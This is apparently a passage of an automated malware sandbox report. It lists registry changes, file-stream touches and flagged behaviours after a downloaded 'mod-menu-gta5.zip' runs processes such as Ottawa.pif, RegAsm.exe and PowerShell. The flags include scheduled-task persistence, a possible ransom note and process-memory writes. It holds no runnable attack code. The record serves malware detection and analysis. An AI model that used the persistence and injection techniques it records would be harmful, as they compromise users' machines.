Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\dnSpy-net-win64.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\mod-menu-gta5.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe:Zone.Identifier C:\Program Files\7-Zip\7zFM.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1144 wrote to memory of 1208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
